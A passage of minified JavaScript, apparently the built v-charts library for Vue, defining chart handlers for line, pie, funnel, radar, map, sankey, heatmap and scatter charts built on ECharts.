:[Object,String],textStyle:[Object,Array],animation:Object,theme:Object,themeName:String,loading:Boolean,dataEmpty:Boolean,extend:Object,judgeWidth:{type:Boolean,default:!1},widthChangeDelay:{type:Number,default:300},tooltipFormatter:{type:Function},resizeable:{type:Boolean,default:!0},resizeDelay:{type:Number,default:200},changeDelay:{type:Number,default:0},setOptionOpts:{type:[Boolean,Object],default:!0},cancelResizeCheck:Boolean,notSetUnchange:Array,log:Boolean},watch:{data:{deep:!0,handler:function(e){e&&this.changeHandler()}},settings:{deep:!0,handler:function(e){e.type&&this.chartLib&&(this.chartHandler=this.chartLib[e.type]),this.changeHandler()}},width:"nextTickResize",height:"nextTickResize",events:{deep:!0,handler:"createEventProxy"},theme:{deep:!0,handler:"themeChange"},themeName:"themeChange",resizeable:"resizeableHandler"},computed:{canvasStyle:function(){return{width:this.width,height:this.height,position:"relative"}},chartColor:function(){return this.colors||this.theme&&this.theme.color||n}},methods:{dataHandler:function(){if(this.chartHandler){var e=this.data,t=e,n=t.columns,i=void 0===n?[]:n,r=t.rows,o=void 0===r?[]:r,a={tooltipVisible:this.tooltipVisible,legendVisible:this.legendVisible,echarts:this.echarts,color:this.chartColor,tooltipFormatter:this.tooltipFormatter,_once:this._once};this.beforeConfig&&(e=this.beforeConfig(e));var s=this.chartHandler(i,o,this.settings,a);s&&("function"===typeof s.then?s.then(this.optionsHandler):this.optionsHandler(s))}},nextTickResize:function(){this.$nextTick(this.resize)},resize:function(){(this.cancelResizeCheck||this.$el&&this.$el.clientWidth&&this.$el.clientHeight)&&this.echartsResize()},echartsResize:function(){this.echarts&&this.echarts.resize()},optionsHandler:function(t){var n=this;if(this.legendPosition&&t.legend&&(t.legend[this.legendPosition]=10,~["left","right"].indexOf(this.legendPosition)&&(t.legend.top="middle",t.legend.orient="vertical")),t.color=this.chartColor,s.forEach((function(e){n[e]&&(t[e]=n[e])})),this.animation&&he(t,this.animation),this.markArea||this.markLine||this.markPoint){var i={markArea:this.markArea,markLine:this.markLine,markPoint:this.markPoint},r=t.series;P(r)?r.forEach((function(e){ce(e,i)})):O(r)&&ce(r,i)}this.extend&&ue(t,this.extend),this.afterConfig&&(t=this.afterConfig(t));var o=this.setOptionOpts;!this.settings.bmap&&!this.settings.amap||O(o)||(o=!1),this.notSetUnchange&&this.notSetUnchange.length&&(this.notSetUnchange.forEach((function(e){var i=t[e];i&&(V(i,n._store[e])?t[e]=void 0:n._store[e]=N(i))})),O(o)?o.notMerge=!1:o=!1),this._isDestroyed||(this.log&&console.log(t),this.echarts.setOption(t,o),this.$emit("ready",this.echarts,t,e),this._once["ready-once"]||(this._once["ready-once"]=!0,this.$emit("ready-once",this.echarts,t,e)),this.judgeWidth&&this.judgeWidthHandler(t),this.afterSetOption&&this.afterSetOption(this.echarts,t,e),this.afterSetOptionOnce&&!this._once["afterSetOptionOnce"]&&(this._once["afterSetOptionOnce"]=!0,this.afterSetOptionOnce(this.echarts,t,e)))},judgeWidthHandler:function(e){var t=this,n=this.widthChangeDelay,i=this.resize;this.$el.clientWidth||this.$el.clientHeight?i():this.$nextTick((function(e){t.$el.clientWidth||t.$el.clientHeight?i():setTimeout((function(e){i(),t.$el.clientWidth&&t.$el.clientHeight||console.warn(" Can't get dom width or height ")}),n)}))},resizeableHandler:function(e){e&&!this._once.onresize&&this.addResizeListener(),!e&&this._once.onresize&&this.removeResizeListener()},init:function(){if(!this.echarts){var n=this.themeName||this.theme||t;this.echarts=e.init(this.$refs.canvas,n,this.initOptions),this.data&&this.changeHandler(),this.createEventProxy(),this.resizeable&&this.addResizeListener()}},addResizeListener:function(){window.addEventListener("resize",this.resizeHandler),this._once.onresize=!0},removeResizeListener:function(){window.removeEventListener("resize",this.resizeHandler),this._once.onresize=!1},addWatchToProps:function(){var e=this,t=this._watchers.map((function(e){return e.expression}));Object.keys(this.$props).forEach((function(n){if(!~t.indexOf(n)&&!~a.indexOf(n)){var i={};~["[object Object]","[object Array]"].indexOf(L(e.$props[n]))&&(i.deep=!0),e.$watch(n,(function(){e.changeHandler()}),i)}}))},createEventProxy:function(){var e=this,t=this,n=Object.keys(this.events||{});n.length&&n.forEach((function(n){-1===e.registeredEvents.indexOf(n)&&(e.registeredEvents.push(n),e.echarts.on(n,function(e){return function(){if(e in t.events){for(var n=arguments.length,i=Array(n),r=0;r"),e.forEach((function(e){var r=e.seriesName,o=e.data,a=e.marker,l=null,u=~s.indexOf(r)?n[1]:n[0],c=P(o)?o[1]:o;l=B(c,u,i),t.push(a),t.push(r+": "+l),t.push("
")})),t.join("")}}}function _e(e){var t=e.metrics,n=e.legendName,i=e.labelMap;if(!n&&!i)return{data:t};var r=i?t.map((function(e){return null==i[e]?e:i[e]})):t;return{data:r,formatter:function(e){return null!=n[e]?n[e]:e}}}var be=function(e,t,n,i){t=P(t)?t:[],e=P(e)?e:[];var r=n.axisSite,o=void 0===r?{}:r,a=n.yAxisType,s=void 0===a?["normal","normal"]:a,l=n.xAxisType,u=void 0===l?"category":l,c=n.yAxisName,h=void 0===c?[]:c,d=n.dimension,f=void 0===d?[e[0]]:d,p=n.xAxisName,g=void 0===p?[]:p,m=n.axisVisible,v=void 0===m||m,y=n.area,_=n.stack,b=n.scale,x=void 0===b?[!1,!1]:b,w=n.min,k=void 0===w?[null,null]:w,S=n.max,M=void 0===S?[null,null]:S,A=n.nullAddZero,C=void 0!==A&&A,T=n.digit,I=void 0===T?2:T,D=n.legendName,L=void 0===D?{}:D,E=n.labelMap,O=void 0===E?{}:E,R=n.label,N=n.itemStyle,z=n.lineStyle,F=n.areaStyle,V=i.tooltipVisible,B=i.legendVisible,j=i.tooltipFormatter,H=e.slice();o.left&&o.right?H=o.left.concat(o.right):o.left&&!o.right?H=o.left:n.metrics?H=n.metrics:H.splice(e.indexOf(f[0]),1);var q=B&&_e({metrics:H,legendName:L,labelMap:O}),G=V&&ye({axisSite:o,yAxisType:s,digit:I,labelMap:O,xAxisType:u,tooltipFormatter:j}),W=ge({dimension:f,rows:t,xAxisName:g,axisVisible:v,xAxisType:u}),$=ve({yAxisName:h,yAxisType:s,axisVisible:v,scale:x,min:k,max:M,digit:I}),U=me({rows:t,axisSite:o,metrics:H,area:y,stack:_,nullAddZero:C,labelMap:O,label:R,itemStyle:N,lineStyle:z,areaStyle:F,xAxisType:u,dimension:f}),Z={legend:q,xAxis:W,series:U,yAxis:$,tooltip:G};return Z},xe=M({},de,{name:"VeLine",data:function(){return this.chartHandler=be,{}}}),we=100,ke=[80,100],Se=[20,100],Me=200;function Ae(e){var t=e.innerRows,n=e.dataType,i=e.percentShow,r=e.dimension,o=e.metrics,a=e.radius,s=e.offsetY,l=e.selectedMode,u=e.hoverAnimation,c=e.digit,h=e.roseType,d=e.label,f=e.level,p=e.limitShowNum,g=e.isRing,m=e.labelLine,v=e.itemStyle,y=[],_={},b=[];f?(f.forEach((function(e,t){e.forEach((function(e){Y(_,e,t)}))})),t.forEach((function(e){var t=_[e[r]];t&&t.length&&t.forEach((function(t){Y(b,t,e)}))}))):b.push(t);var x={type:"pie",selectedMode:l,hoverAnimation:u,roseType:h,center:["50%",s]},w=b.length;if(b.forEach((function(e,t){var s=M({data:[]},x),l=a/w;if(t){var u=l+a/(2*w)*(2*t-1),h=u+a/(2*w);s.radius=[u,h]}else s.radius=g?a:l;w>1&&0===t&&(s.label={normal:{position:"inner"}}),d&&(s.label=d),m&&(s.labelLine=m),v&&(s.itemStyle=v),i&&(s.label={normal:{show:!0,position:w>1&&0===t?"inner":"outside",formatter:function(e){var t=[];return t.push(e.name+":"),t.push(B(e.value,n,c)),t.push("("+e.percent+"%)"),t.join(" ")}}}),s.data=e.map((function(e){return{name:e[r],value:e[o]}})),y.push(s)})),p&&p"+i+":"),n.push(B(o,t,r)),n.push("("+a+")")}))):(n.push(e.name+":"),n.push(B(e.value,t,r)),n.push("("+e.percent+"%)")),n.join(" ")}}}var Ie=function(e,t,n,i,r){var o=N(t),a=n.dataType,s=void 0===a?"normal":a,l=n.percentShow,u=n.dimension,c=void 0===u?e[0]:u,h=n.metrics,d=void 0===h?e[1]:h,f=n.roseType,p=void 0!==f&&f,g=n.radius,m=void 0===g?r?p?Se:ke:we:g,v=n.offsetY,y=void 0===v?Me:v,_=n.legendLimit,b=void 0===_?30:_,x=n.selectedMode,w=void 0!==x&&x,k=n.hoverAnimation,S=void 0===k||k,M=n.digit,A=void 0===M?2:M,C=n.legendName,T=void 0===C?{}:C,I=n.label,D=void 0!==I&&I,L=n.level,E=void 0!==L&&L,O=n.limitShowNum,P=void 0===O?0:O,R=n.labelLine,z=n.itemStyle,F=i.tooltipVisible,V=i.legendVisible;P&&o.sort((function(e,t){return t[d]-e[d]}));var B={innerRows:o,dataType:s,percentShow:l,dimension:c,metrics:d,radius:m,offsetY:y,selectedMode:w,hoverAnimation:S,digit:A,roseType:p,label:D,level:E,legendName:T,limitShowNum:P,isRing:r,labelLine:R,itemStyle:z},j=Ae(B),H={innerRows:o,dimension:c,legendLimit:b,legendName:T,level:E,limitShowNum:P},q=V&&Ce(H),G=F&&Te({dataType:s,innerRows:o,limitShowNum:P,digit:A,metrics:d,dimension:c}),W={series:j,legend:q,tooltip:G};return W},De=function(e,t,n,i){return Ie(e,t,n,i,!0)},Le=M({},de,{name:"VePie",data:function(){return this.chartHandler=Ie,{}}}),Ee=M({},de,{name:"VeRing",data:function(){return this.chartHandler=De,{}}});function Oe(e,t){return{trigger:"axis",axisPointer:{type:"shadow"},formatter:function(n){var i=n[1];return[i.name+"
"+i.seriesName+" :",""+B(i.value,e,t)].join("")}}}function Pe(e){var t=e.dimension,n=e.rows,i=e.remainStatus,r=e.totalName,o=e.remainName,a=e.labelMap,s=e.xAxisName,l=e.axisVisible,u=[r].concat(n.map((function(e){return e[t]})));return"have-remain"===i&&(u=u.concat([o])),{type:"category",name:a&&a[s]||s,splitLine:{show:!1},data:u,show:l}}function Re(e){var t=e.dataType,n=e.yAxisName,i=e.axisVisible,r=e.digit,o=e.labelMap;return{type:"value",name:null!=o[n]?o[n]:n,axisTick:{show:!1},axisLabel:{formatter:function(e){return B(e,t,r)}},show:i}}function Ne(e){var t=e.dataType,n=e.rows,i=e.metrics,r=e.totalNum,o=e.remainStatus,a=e.dataSum,s=e.digit,l={type:"bar",stack:"总量"},u=a,c=r,h=void 0,d=void 0,f=n.map((function(e){return e[i]}));"have-remain"===o?(h=[0].concat(n.map((function(e){return c-=e[i],c}))).concat([0]),d=[r].concat(f).concat([r-a])):(h=[0].concat(n.map((function(e){return u-=e[i],u}))),d=[a].concat(f));var p=[];return p.push(M({name:"辅助",itemStyle:{normal:{opacity:0},emphasis:{opacity:0}},data:h},l)),p.push(M({name:"数值",label:{normal:{show:!0,position:"top",formatter:function(e){return B(e.value,t,s)}}},data:d},l)),p}function ze(e,t){return t?t>e?"have-remain":"none-remain":"not-total"}var Fe=function(e,t,n,i){var r=n.dataType,o=void 0===r?"normal":r,a=n.dimension,s=void 0===a?e[0]:a,l=n.totalName,u=void 0===l?"总计":l,c=n.totalNum,h=n.remainName,d=void 0===h?"其他":h,f=n.xAxisName,p=void 0===f?s:f,g=n.labelMap,m=void 0===g?{}:g,v=n.axisVisible,y=void 0===v||v,_=n.digit,b=void 0===_?2:_,x=i.tooltipVisible,w=e.slice();w.splice(w.indexOf(s),1);var k=w[0],S=k,M=x&&Oe(o,b),A=parseFloat(t.reduce((function(e,t){return e+Number(t[k])}),0).toFixed(b)),C=ze(A,c),T={dimension:s,rows:t,remainStatus:C,totalName:u,remainName:d,xAxisName:p,labelMap:m,axisVisible:y},I=Pe(T),D=Re({dataType:o,yAxisName:S,axisVisible:y,digit:b,labelMap:m}),L={dataType:o,rows:t,dimension:s,metrics:k,totalNum:c,remainStatus:C,dataSum:A,digit:b},E=Ne(L),O={tooltip:M,xAxis:I,yAxis:D,series:E};return O},Ve=M({},de,{name:"VeWaterfall",data:function(){return this.chartHandler=Fe,{}}});function Be(e,t){return{trigger:"item",formatter:function(n){var i=[];return i.push(o(n.color)),i.push(n.name+": "+B(n.data.realValue,e,t)),i.join("")}}}function je(e){var t=e.data,n=e.legendName;return{data:t,formatter:function(e){return null!=n[e]?n[e]:e}}}function He(e){var t=e.dimension,n=e.metrics,i=e.rows,r=e.sequence,o=e.ascending,a=e.label,s=e.labelLine,l=e.itemStyle,u=e.filterZero,c=e.useDefaultOrder,h={type:"funnel"},d=i.sort((function(e,n){return r.indexOf(e[t])-r.indexOf(n[t])}));u&&(d=d.filter((function(e){return e[n]})));var f=!1;d.some((function(e,t){if(t&&e[n]>d[t-1][n])return f=!0,!0}));var p=100/d.length;return h.data=f&&!c?d.slice().reverse().map((function(e,i){return{name:e[t],value:(i+1)*p,realValue:e[n]}})):d.map((function(e){return{name:e[t],value:e[n],realValue:e[n]}})),o&&(h.sort="ascending"),a&&(h.label=a),s&&(h.labelLine=s),l&&(h.itemStyle=l),h}var qe=function(e,t,n,i){var r=e.slice(),o=t.slice(),a=n.dataType,s=void 0===a?"normal":a,l=n.dimension,u=void 0===l?r[0]:l,c=n.sequence,h=void 0===c?o.map((function(e){return e[u]})):c,d=n.digit,f=void 0===d?2:d,p=n.ascending,g=n.label,m=n.labelLine,v=n.legendName,y=void 0===v?{}:v,_=n.itemStyle,b=n.filterZero,x=n.useDefaultOrder,w=i.tooltipVisible,k=i.legendVisible,S=void 0;if(n.metrics)S=n.metrics;else{var M=r.slice();M.splice(r.indexOf(u),1),S=M[0]}var A=w&&Be(s,f),C=k&&je({data:h,legendName:y}),T=He({dimension:u,metrics:S,rows:o,sequence:h,ascending:p,label:g,labelLine:m,itemStyle:_,filterZero:b,useDefaultOrder:x}),I={tooltip:A,legend:C,series:T};return I},Ge=M({},de,{name:"VeFunnel",data:function(){return this.chartHandler=qe,{}}});function We(e,t,n){var i=e.map((function(e){return e[t]}));return{data:i,formatter:function(e){return null!=n[e]?n[e]:e}}}function $e(e,t,n){var i=[],r=[];return t.indicator.map((function(t,n){i[n]=e[t.name],r[n]=t.name})),{formatter:function(e){var t=[];return t.push(o(e.color)),t.push(e.name+"
"),e.data.value.forEach((function(e,o){t.push(r[o]+": "),t.push(B(e,i[o],n)+"
")})),t.join("")}}}function Ue(e,t,n){var i={indicator:[],shape:"circle",splitNumber:5},r={};return e.forEach((function(e){t.forEach((function(t){var i=null!=n[t]?n[t]:t;r[i]?r[i].push(e[t]):r[i]=[e[t]]}))})),i.indicator=Object.keys(r).map((function(e){return{name:e,max:Math.max.apply(null,r[e])}})),i}function Ze(e){var t=e.rows,n=e.dimension,i=e.metrics,r=e.radar,o=e.label,a=e.itemStyle,s=e.lineStyle,l=e.labelMap,u=e.areaStyle,c={};r.indicator.forEach((function(e,t){var n=e.name;c[n]=t}));var h=t.map((function(e){var t={value:[],name:e[n]};return Object.keys(e).forEach((function(n){if(~i.indexOf(n)){var r=null!=l[n]?c[l[n]]:c[n];t.value[r]=e[n]}})),t})),d={name:n,type:"radar",data:h};return o&&(d.label=o),a&&(d.itemStyle=a),s&&(d.lineStyle=s),u&&(d.areaStyle=u),[d]}var Ye=function(e,t,n,i){var r=n.dataType,o=void 0===r?{}:r,a=n.legendName,s=void 0===a?{}:a,l=n.labelMap,u=void 0===l?{}:l,c=n.dimension,h=void 0===c?e[0]:c,d=n.digit,f=void 0===d?2:d,p=n.label,g=n.itemStyle,m=n.lineStyle,v=n.areaStyle,y=i.tooltipVisible,_=i.legendVisible,b=e.slice();n.metrics?b=n.metrics:b.splice(e.indexOf(h),1);var x=_&&We(t,h,s),w=Ue(t,b,u),k=y&&$e(o,w,f),S=Ze({rows:t,dimension:h,metrics:b,radar:w,label:p,itemStyle:g,lineStyle:m,labelMap:u,areaStyle:v}),M={legend:x,tooltip:k,radar:w,series:S};return M},Xe=M({},de,{name:"VeRadar",data:function(){return this.chartHandler=Ye,{}}}),Ke=M({},de,{name:"VeChart",data:function(){return this.chartLib={bar:oe,histogram:ae,line:be,pie:Ie,ring:De,funnel:qe,radar:Ye,waterfall:Fe},this.chartHandler=this.chartLib[this.settings.type],{}}});function Je(e,t,n,i,r,a){return{formatter:function(s){var l=[];return s.name?(l.push(s.name+"
"),i.forEach((function(i,u){var c=null!=a[i]?a[i]:i;l.push(o(r[u])+" "+c+" : "),n[s.name]?l.push(B(n[s.name][i],e[i],t)):l.push("-"),l.push("
")})),l.join(" ")):""}}}function Qe(e){var t=e.position,n=e.selectData,i=e.dimension,r=e.metrics,o=e.rows,a=e.label,s=e.itemStyle,l=e.selectedMode,u=e.roam,c=e.center,h=e.aspectScale,d=e.boundingCoords,f=e.zoom,p=e.labelMap,g=e.scaleLimit,m=e.mapGrid,v=[],y={type:"map",mapType:t};return r.forEach((function(e){var t=M({name:null!=p[e]?p[e]:e,data:[],selectedMode:l,roam:u,center:c,aspectScale:h,boundingCoords:d,zoom:f,scaleLimit:g},y);m&&Object.keys(m).forEach((function(e){t[e]=m[e]})),et(s,t,"itemStyle"),et(a,t,"label"),o.forEach((function(r){t.data.push({name:r[i],value:r[e],selected:n})})),v.push(t)})),v}function et(e,t,n){"object"===("undefined"===typeof e?"undefined":k(e))?t[n]=e:e&&(t[n]={normal:{show:!0},emphasis:{show:!0}})}function tt(e){var t=e.metrics,n=e.legendName,i=e.labelMap;if(!n&&!i)return{data:t};var r=i?t.map((function(e){return null==i[e]?e:i[e]})):t;return{data:r,formatter:function(e){return null!=n[e]?n[e]:e}}}function nt(t,n){var i=t._once,r=t.registerSign,o=t.beforeRegisterMap,a=t.beforeRegisterMapOnce,s=t.registerSignOnce,l=t.position,u=t.specialAreas;i[r]||(o&&(n=o(n)),a&&!i[s]&&(i[s]=!0,n=a(n)),i[r]=!0,e.registerMap(l,n,u))}var it=function(e,t,n,i){var r=n.position,o=void 0===r?"china":r,a=n.selectData,s=void 0!==a&&a,l=n.selectedMode,u=n.label,c=void 0===u||u,h=n.dataType,d=void 0===h?{}:h,f=n.digit,p=void 0===f?2:f,g=n.dimension,m=void 0===g?e[0]:g,v=n.roam,y=n.center,_=n.aspectScale,b=n.boundingCoords,x=n.zoom,w=n.scaleLimit,k=n.legendName,S=void 0===k?{}:k,M=n.labelMap,A=void 0===M?{}:M,C=n.mapGrid,T=n.itemStyle,I=n.positionJsonLink,D=n.beforeRegisterMap,L=n.beforeRegisterMapOnce,E=n.mapURLProfix,O=void 0===E?"https://unpkg.com/echarts@3.6.2/map/json/":E,P=n.specialAreas,R=void 0===P?{}:P,N=n.mapOrigin,z=e.slice();n.metrics?z=n.metrics:z.splice(e.indexOf(m),1);var F=i.tooltipVisible,V=i.legendVisible,B=i.color,j=i._once,H={};t.forEach((function(e){H[e[m]]=e}));var q=F&&Je(d,p,H,z,B,A),W=V&&tt({metrics:z,legendName:S,labelMap:A}),$={position:o,selectData:s,label:c,itemStyle:T,dimension:m,metrics:z,rows:t,selectedMode:l,roam:v,center:y,aspectScale:_,boundingCoords:b,zoom:x,labelMap:A,scaleLimit:w,mapGrid:C},U=Qe($),Z={_once:j,beforeRegisterMap:D,beforeRegisterMapOnce:L,registerSign:"MAP_REGISTER_"+o,registerSignOnce:"ONCE_MAP_REGISTER_"+o,position:o,specialAreas:R};return N?(nt(Z,N),{series:U,tooltip:q,legend:W}):G({position:o,positionJsonLink:I,beforeRegisterMapOnce:L,mapURLProfix:O}).then((function(e){return nt(Z,e),{series:U,tooltip:q,legend:W}}))},rt=M({},de,{name:"VeMap",data:function(){return this.chartHandler=it,{}}}),ot=function(e,t,n,i){var r=n.key,o=n.v,a=n.bmap,s=n.useOuterMap,l=i._once,u="bmap_register";return r||s||console.warn("settings.key must be a string."),l[u]?{}:(l[u]=!0,s?{bmap:a}:U(r,o).then((function(e){return{bmap:a}})))},at=M({},de,{name:"VeBmap",data:function(){return this.chartHandler=ot,{}}}),st=function(e,t,n,i){var r=n.key,o=n.v,a=n.amap,s=n.useOuterMap,l=i._once,u="amap_register";return r||s||console.warn("settings.key must be a string."),l[u]?{}:(l[u]=!0,s?{amap:a}:Z(r,o).then((function(e){return{amap:a}})))},lt=M({},de,{name:"VeAmap",data:function(){return this.chartHandler=st,{}}});function ut(e){var t=e.itemDataType,n=e.linksDataType,i=e.digit;return{trigger:"item",formatter:function(e){var r=[],a=e.name,s=e.data,l=e.value,u=e.color;return r.push(o(u)),r.push(a+" : "),s&&s.source?r.push(B(l,n,i)+"
"):r.push(B(l,t,i)+"
"),r.join("")}}}function ct(e){var t=e.rows,n=e.dimension,i=e.metrics,r=e.links,o=e.valueFull,a=e.useDataValue,s=e.label,l=e.itemStyle,u=e.lineStyle,c={},h=t.map((function(e){return c[e[n]]=e[i],{name:e[n],value:e[i]}})),d=null;d=a?r.map((function(e){return M({},e,{value:c[e.target]})})):o?r:r.map((function(e){return null==e.value?M({},e,{value:c[e.target]}):e}));var f={type:"sankey",data:h,links:d};return s&&(f.label=s),l&&(f.itemStyle=l),u&&(f.lineStyle=u),[f]}var ht=function(e,t,n,i){var r=n.links,o=n.dimension,a=void 0===o?e[0]:o,s=n.metrics,l=void 0===s?e[1]:s,u=n.dataType,c=void 0===u?["normal","normal"]:u,h=n.digit,d=void 0===h?2:h,f=n.valueFull,p=void 0!==f&&f,g=n.useDataValue,m=void 0!==g&&g,v=n.label,y=n.itemStyle,_=n.lineStyle;if(r){var b=c[0],x=c[1],w=ut({itemDataType:b,linksDataType:x,digit:d}),k=ct({rows:t,dimension:a,metrics:l,links:r,valueFull:p,useDataValue:m,label:v,itemStyle:y,lineStyle:_});return{tooltip:w,series:k}}console.warn("links is needed in settings!")},dt=M({},de,{name:"VeSankey",data:function(){return this.chartHandler=ht,{}}});function ft(e,t){var n=[];return e.forEach((function(e){~n.indexOf(e[t])||n.push(e[t])})),n}function pt(e){var t=e.rows,n=e.innerXAxisList,i=e.innerYAxisList,r=e.xDim,o=e.yDim,a=e.metrics,s=e.type,l=e.extraMetrics,u=null;return u="cartesian"===s?t.map((function(e){var t=n.indexOf(e[r]),s=i.indexOf(e[o]),u=a?e[a]:1,c=l.map((function(t){return e[t]||"-"}));return{value:[t,s,u].concat(c)}})):t.map((function(e){var t=a?e[a]:1;return{value:[e[r],e[o],t]}})),u}function gt(e,t){return{type:"category",data:e,name:t,nameLocation:"end",splitArea:{show:!0}}}function mt(e){var t=e.innerMin,n=e.innerMax,o=e.type,a=e.heatColor,s=e.series,l={min:t,max:n,calculable:!0},u=null;return"map"===o?(u={orient:"vertical",left:0,bottom:0,inRange:{color:a||i}},s[0].data.length||(u.show=!1)):u="bmap"===o||"amap"===o?{show:!1,orient:"vertical",left:0,bottom:0,inRange:{color:a||r}}:{orient:"horizontal",left:"center",bottom:10,dimension:2,inRange:a&&{color:a}},M(l,u)}function vt(e){var t=e.chartData;return[{type:"heatmap",data:t}]}function yt(e){var t=e.dataType,n=e.innerXAxisList,i=e.innerYAxisList,r=e.digit,a=e.extraMetrics,s=e.metrics;return{trigger:"item",formatter:function(e){var l=e.color,u=A(e.data.value),c=u[0],h=u[1],d=u[2],f=u.slice(3),p=[];return p.push(n[c]+" ~ "+i[h]+"
"),a.forEach((function(e,t){p.push(e+": "+f[t]+"
")})),p.push(o(l)+" "+s+": "+B(d,t,r)+"
"),p.join("")}}}var _t=function(t,n,i,r){var o=i.type,a=void 0===o?"cartesian":o,s=i.xAxisList,l=i.yAxisList,u=i.dimension,c=void 0===u?[t[0],t[1]]:u,h=i.metrics,d=void 0===h?t[2]:h,f=i.dataType,p=void 0===f?"normal":f,g=i.min,m=i.max,v=i.digit,y=i.bmap,_=i.amap,b=i.geo,x=i.key,w=i.v,k=void 0===w?"2.0":w,S=i.position,A=i.positionJsonLink,C=i.beforeRegisterMap,T=i.pointSize,I=void 0===T?10:T,D=i.blurSize,L=void 0===D?5:D,E=i.heatColor,O=i.yAxisName,P=i.xAxisName,R=i.beforeRegisterMapOnce,N=i.mapURLProfix,z=void 0===N?"https://unpkg.com/echarts@3.6.2/map/json/":N,F=i.specialAreas,V=void 0===F?{}:F,B=r.tooltipVisible,j=s,H=l,q=[],W=[],$=c.concat([d]);t.forEach((function(e){~$.indexOf(e)||W.push(e)})),"cartesian"===a?(j&&j.length||(j=ft(n,c[0])),H&&H.length||(H=ft(n,c[1])),q=pt({rows:n,innerXAxisList:j,innerYAxisList:H,xDim:c[0],yDim:c[1],metrics:d,type:a,extraMetrics:W})):q=pt({rows:n,xDim:c[0],yDim:c[1],metrics:d,type:a,extraMetrics:W});var Y=d?n.map((function(e){return e[d]})):[0,5];Y.length||(Y=[0]);var X=g||Math.min.apply(null,Y),K=m||Math.max.apply(null,Y),J=gt(j,P),Q=gt(H,O),ee=vt({chartData:q}),te=mt({innerMin:X,innerMax:K,type:a,heatColor:E,series:ee}),ne=B&&yt({dataType:p,innerXAxisList:j,innerYAxisList:H,digit:v,extraMetrics:W,metrics:d}),ie={visualMap:te,series:ee};return"bmap"===a?(M(ie.series[0],{coordinateSystem:"bmap",pointSize:I,blurSize:L}),U(x,k).then((function(e){return M({bmap:y},ie)}))):"map"===a?(ie.series[0].coordinateSystem="geo",G({position:S,positionJsonLink:A,beforeRegisterMapOnce:R,mapURLProfix:z}).then((function(t){var n=M({map:S},b);return C&&(t=C(t)),e.registerMap(S,t,V),M({geo:n},ie)}))):"amap"===a?(M(ie.series[0],{coordinateSystem:"amap",pointSize:I,blurSize:L}),Z(x,k).then((function(e){return M({amap:_},ie)}))):M({xAxis:J,yAxis:Q,tooltip:ne},ie)},bt=M({},de,{name:"VeHeatmap",data:function(){return this.chartHandler=_t,{}}});function xt(e,t){return{data:e,formatter:function(e){return null!=t[e]?t[e]:e}}}function wt(e){var t=e.tooltipTrigger;return{trigger:t,formatter:function(t){return P(t)?t.map((function(t){return kt(t,e)})).join(""):kt(t,e)}}}function kt(e,t){var n=t.labelMap,i=t.columns,r=t.dataType,a=t.digit,s=[],l=e.color,u=e.seriesName,c=e.data.value;return s.push(o(l)+" "+u+"
"),c.forEach((function(e,t){var o=n[i[t]]||i[t],l=isNaN(e)?e:B(e,r[i[t]],a);s.push(o+": "+l+"
")})),s.join("")}function St(e){var t=e.xAxisName,n=e.axisVisible,i=e.xAxisType,r=e.rows,o=e.dataLabels,a=e.dimension,s=[];return o.forEach((function(e){var t=r[e];t.forEach((function(e){var t=e[a];t&&!~s.indexOf(t)&&s.push(t)}))})),[{type:i,show:n,name:t,data:s}]}function Mt(e){var t=e.min,n=e.max,i=e.scale,r=e.yAxisName,o=e.dataType,a=e.metrics,s=e.digit,l=e.axisVisible;return{type:"value",show:l,scale:i,min:t,max:n,axisTick:{show:!1},name:r,axisLabel:{formatter:function(e){return B(e,o[a[0]],s)}}}}function At(e){var t=e.rows,n=e.dataLabels,i=e.columns,r=e.metrics,o=e.dimension,a=e.label,s=e.itemStyle,l=e.symbol,u=e.symbolSizeMax,c=e.symbolSize,h=e.symbolRotate,d=e.symbolOffset,f=e.cursor,p=i.filter((function(e){return!~r.indexOf(e)&&e!==o})),g=[];n.forEach((function(e){t[e].forEach((function(e){g.push(e[r[1]])}))}));var m=Math.max.apply(null,g),v=[];return n.forEach((function(e){var n=[],i=t[e];i.forEach((function(e){var t={value:[]};t.value.push(e[o],e[r[0]],e[r[1]]),p.forEach((function(n){t.value.push(e[n])})),t.symbolSize=c||e[r[1]]/m*u,n.push(t)})),v.push({type:"scatter",data:n,name:e,label:a,itemStyle:s,symbol:l,symbolRotate:h,symbolOffset:d,cursor:f})})),v}var Ct=function(e,t,n,i){var r=n.dimension,o=void 0===r?e[0]:r,a=n.metrics,s=void 0===a?[e[1],e[2]]:a,l=n.dataType,u=void 0===l?{}:l,c=n.xAxisType,h=void 0===c?"category":c,d=n.xAxisName,f=n.yAxisName,p=n.digit,g=void 0===p?2:p,m=n.legendName,v=void 0===m?{}:m,y=n.labelMap,_=void 0===y?{}:y,b=n.tooltipTrigger,x=void 0===b?"item":b,w=n.axisVisible,k=void 0===w||w,S=n.symbolSizeMax,A=void 0===S?50:S,C=n.symbol,T=n.symbolSize,I=n.symbolRotate,D=n.symbolOffset,L=n.cursor,E=n.min,O=n.max,R=n.scale,N=n.label,z=n.itemStyle;if(P(t)){var F=M({},n,{xAxisName:d?[d]:void 0,yAxisName:f?[f]:void 0,scale:R?[R]:void 0,min:E?[E]:void 0,max:O?[O]:void 0,dimension:o?[o]:void 0}),V=be(e,t,F,i);return V&&V.series?(V.series.forEach((function(e){M(e,{type:"scatter",symbol:C,symbolSize:T||10,symbolRotate:I,symbolOffset:D,cursor:L,label:N,itemStyle:z})})),V):{}}var B=i.tooltipVisible,j=i.legendVisible,H=Object.keys(t),q=j&&xt(H,v),G=B&&wt({tooltipTrigger:x,labelMap:_,columns:e,dataType:u,digit:g}),W=St({xAxisName:d,axisVisible:k,xAxisType:h,dataLabels:H,dimension:o,rows:t}),$=Mt({min:E,max:O,scale:R,yAxisName:f,dataType:u,metrics:s,digit:g,axisVisible:k}),U=At({rows:t,dataLabels:H,columns:e,metrics:s,dimension:o,label:N,itemStyle:z,symbol:C,symbolSizeMax:A,symbolSize:T,symbolRotate:I,symbolOffset:D,cursor:L});return{legend:q,tooltip:G,xAxis:W,yAxis:$,series:U}},Tt=M({},de,{name:"VeScatter",data:function(){return this.chartHandler=Ct,{}}}),It=[5,10,20,30],Dt="日K",Lt="#ec0000",Et="#00da3c",Ot=50,Pt=100,Rt={show:!1};function Nt(e){var t=e.showMA,n=e.MA,i=e.legendName,r=e.labelMap,o=[Dt];return t&&(o=o.concat(n.map((function(e){return"MA"+e})))),r&&(o=o.map((function(e){return null==r[e]?e:r[e]}))),{data:o,formatter:function(e){return null!=i[e]?i[e]:e}}}function zt(e){var 